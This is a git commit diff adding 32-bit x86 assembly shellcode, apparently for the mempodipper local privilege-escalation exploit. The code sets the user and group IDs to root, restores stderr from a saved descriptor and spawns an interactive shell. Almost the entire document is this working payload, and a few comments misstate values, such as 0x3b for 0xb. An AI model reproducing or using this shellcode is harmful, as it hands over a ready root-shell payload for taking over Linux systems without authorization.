Add 32bit shellcode.

1 files changed, 53 insertions, 0 deletions

diff --git a/shellcode-32.s b/shellcode-32.s
new file mode 100644
index 0000000..d08b93f
--- /dev/null
+++ b/shellcode-32.s
@@ -0,0 +1,53 @@
+BITS 32
+; This shell code sets uid and gid to 0 and execs a shell in interactive mode.
+; It also reopens stderr that was previously saved inside fd 6, for use with mempodipper.
+;
+; by zx2c4
+
+
+;setuid(0)
+xor ebx,ebx
+mov al,0x17
+int 0x80
+;setgid(0)
+xor ebx,ebx
+mov al,0x2e
+int 0x80
+;dup2(6, 2)
+mov bl,0x6
+mov cl,0x2
+mov al,0x3f
+int 0x80
+
+
+
+; execve("//bin/sh", ["//bin/sh", "-i", 0], 0)
+xor eax,eax			; eax = 0
+push eax			; push eax
+push 0x68732f6e			; push //bin/sh
+push 0x69622f2f
+mov ebx,esp			; set ebx (arg 1) to top of stack
+
+xor edx,edx			; edx = 0
+mov dx,'-i'			; edx = '-i'
+push edx			; push edx to stack
+mov eax,esp			; set eax to top of stack
+
+xor edx,edx			; edx = 0
+
+; so at this point:
+;	ebx is a pointer to '//bin/sh'
+;	eax is a pointer to '-i'
+;	edx is null
+; since they are all the same size, we'll push them on the stack
+; and then it will be an array:
+push edx			; push edx to stack
+push eax			; push eax to stack
+push ebx			; push ebx to stack
+mov ecx,esp			; set ecx (arg 2) to top of stack
+
+xor edx,edx			; rdx (arg 3) = 0
+
+xor eax,eax
+mov al,0xb			; al = 0x3b, which is the exec call
+int 0x80